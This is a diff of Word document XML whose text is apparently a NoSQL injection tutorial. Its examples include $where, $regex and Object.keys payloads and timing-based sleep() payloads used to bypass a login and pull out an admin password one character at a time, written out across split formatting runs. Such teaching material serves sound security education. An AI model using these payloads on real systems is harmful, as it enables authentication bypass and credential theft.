+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>username":"wiener","password":"peter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4467,7 +5406,91 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":"wiener","password":"peter", "$where":"0"}{"username":"wiener","password":"peter", "$where":"1"}</w:t>
+        <w:t>{"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>username":"wiener","password":"peter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>", "$where":"0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"}{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>username":"wiener","password":"peter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>", "$where":"1"}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4569,6 +5592,7 @@
         </w:rPr>
         <w:t>If you have injected an operator that enables you to run JavaScript, you may be able to use the </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
@@ -4579,7 +5603,20 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>keys()</w:t>
+        <w:t>keys(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4616,7 +5653,63 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>"$where":"Object.keys(this)[0].match('^.{0}a.*')"</w:t>
+        <w:t>"$where":"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Object.keys</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(this)[0</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>].match</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>('^.{0}a.*')"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4828,7 +5921,63 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":"myuser","password":"mypass"}</w:t>
+        <w:t>{"username":"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>myuser</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>","password":"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>mypass</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4901,7 +6050,50 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":"admin","password":{"$regex":"^.*"}}</w:t>
+        <w:t>{"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>username":"admin","password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>":{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"$regex":"^.*"}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4997,7 +6189,50 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"username":"admin","password":{"$regex":"^a*"}}</w:t>
+        <w:t>{"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>username":"admin","password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>":{</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"$regex":"^a*"}}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5134,7 +6369,59 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>Insert a timing based payload into the input. A timing based payload causes an intentional delay in the response when executed. For example, </w:t>
+        <w:t xml:space="preserve">Insert a </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>timing based</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> payload into the input. A </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>timing based</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> payload causes an intentional delay in the response when executed. For example, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5147,19 +6434,73 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>{"$where": "sleep(5000)"}</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> causes an intentional delay of 5000 ms on successful injection.</w:t>
+        <w:t>{"$where": "</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sleep(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>5000)"}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> causes an intentional delay of 5000 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>ms</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> on successful injection.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5214,7 +6555,31 @@
           <w:lang w:eastAsia="en-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>The following timing based payloads will trigger a time delay if the password beings with the letter </w:t>
+        <w:t xml:space="preserve">The following </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>timing based</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> payloads will trigger a time delay if the password beings with the letter </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5252,18 +6617,173 @@
           <w14:ligatures w14:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="27"/>
-          <w:szCs w:val="27"/>
-          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
-          <w:lang w:eastAsia="en-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>admin'+function(x){var waitTill = new Date(new Date().getTime() + 5000);while((x.password[0]==="a") &amp;&amp; waitTill &gt; new Date()){};}(this)+'admin'+function(x){if(x.password[0]==="a"){sleep(5000)};}(this)+'</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>admin'+function</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(x</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">var </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>waitTill</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = new Date(new Date().</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>getTime</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>() + 5000);while((</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>x.password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">[0]==="a") &amp;&amp; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>waitTill</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="27"/>
+          <w:szCs w:val="27"/>
+          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> &gt; new Date()){};}(this)+'admin'+function(x){if(x.password[0]==="a"){sleep(5000)};}(this)+'</w:t>
       </w:r>
     </w:p>
